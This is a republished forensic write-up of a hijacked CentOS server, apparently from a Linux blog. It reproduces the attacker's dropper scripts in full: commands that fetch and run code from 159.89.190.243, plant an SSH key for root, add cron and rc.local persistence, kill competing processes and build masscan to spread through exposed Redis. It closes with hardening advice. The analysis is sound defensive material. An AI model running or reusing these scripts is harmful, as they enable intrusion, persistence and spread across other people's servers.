How a Hidden gpg-agentd Process Hijacked a CentOS Server and Spread via Redis and Masscan
A detailed forensic walkthrough reveals how a compromised CentOS server was hijacked via a disguised gpg-agentd process, leveraged cron jobs to download malicious scripts, abused Redis for persistence, and used masscan for rapid scanning, followed by practical security recommendations to harden servers and Redis instances.
0x00 Background
On a Monday morning the author discovered that a server in the office could not be logged into. The server, a CentOS 6.x machine running nginx, tomcat and redis, had its SSH port 22 blocked by Alibaba Cloud for "malicious outbound traffic". After changing the port the author could connect as root with a weak password, indicating a compromise.
0x01 Finding Clues
Running ps eho command -p 23374 and netstat -pan | grep 23374 revealed a process named gpg-agentd consuming 99% CPU. The name mimics the legitimate gpg-agent but the trailing d suggests a disguised malicious binary.
Further investigation showed two cron jobs that download a script from http://159.89.190.243/ash.php every 15 minutes.
0x02 Motive
The downloaded script ( ash.sh) contains the following commands:
uname -aid
hostnames
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redis' > /root/.ssh/authorized_keys
echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/root
echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/root
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/nullThe script disables SELinux, raises file descriptor limits, installs a persistent SSH public key for password‑less root login, installs bash, and then fetches a second script ( bsh.php).
The second script ( bsh.php) performs the following actions:
sleep $(seq 3 7 | sort -R | head -n1)
cd /tmp || cd /var/tmp
mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/...
sleep 1
if [ -f .watch ]; then rm -rf .watch; exit 0; fi
sleep 1
echo 1 > .watch
sleep 1
ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null
ps x | awk '!/awk/ && /barad_agent|masscan|.sr0|clay|udevs|.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null
sleep 1
if ! [ -x /usr/bin/gpg-agentd ]; then
curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db
echo '/usr/bin/gpg-agentd' > /etc/rc.local
echo 'curl -fsSL 159.89.190.243/ash.php|sh' >> /etc/rc.local
echo 'exit 0' >> /etc/rc.local
fi
chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf /usr/bin/gpg-agentd
sleep 1
if ! [ -x "$(command -v masscan)" ]; then
apt-get update -y
apt-get install -y build-essential libpcap0.8-dev libpcap0.8 make gcc git redis-server redis-tools redis iptables wget curl
yum install -y epel-release git iptables make gcc redis libpcap libpcap-devel wget curl
fi
curl -sL -o x1.tar.gz https://github.com/robertdavidgraham/masscan/archive/1.0.4.tar.gz
[ -f x1.tar.gz ] && tar zxf x1.tar.gz && cd masscan-1.0.4 && make && make install && cd .. && rm -rf masscan-1.0.4
sleep 3 && rm -rf .watch
bash -c 'curl -fsSL 159.89.190.243/rsh.php|bash' 2>/dev/nullThe script downloads and compiles the open‑source scanner masscan , installs it, and then uses it to scan the Internet for open Redis instances on port 6379. Detected hosts are queried with redis-cli to write a malicious configuration that injects an SSH public key into /root/.ssh/authorized_keys, granting the attacker password‑less access.
MASSCAN: the fastest Internet port scanner, capable of scanning the entire IPv4 space in under six minutes at 10 million packets per second. It produces results similar to Nmap but uses an asynchronous custom TCP/IP stack.
0x03 Summary
The three scripts together illustrate a typical ransomware‑like infection chain: a disguised gpg-agentd binary gains root access, installs a persistent SSH key, repeatedly pulls and executes remote binaries, and finally abuses an unauthenticated Redis server to propagate across the network. Log analysis shows many failed SSH login attempts, indicating the initial compromise was likely a brute‑force attack on the root account.
0x04 Security Recommendations
Server hardening
Disable direct root login.
Enforce strong, complex passwords for all accounts.
Change the default SSH port from 22.
Deploy tools such as DenyHosts to block brute‑force attempts.
Prefer key‑based authentication and disable password authentication.
Redis hardening
Bind Redis only to localhost; avoid exposing 0.0.0.0.
Set a strong password for Redis access.
Run Redis under a low‑privilege, non‑root user.
By applying these measures the likelihood of similar compromises can be greatly reduced.
Signed-in readers can open the original source through BestHub's protected redirect.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contactand we will review it promptly.
Liangxu Linux
Liangxu, a self‑taught IT professional now working as a Linux development engineer at a Fortune 500 multinational, shares extensive Linux knowledge—fundamentals, applications, tools, plus Git, databases, Raspberry Pi, etc. (Reply “Linux” to receive essential resources.)
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.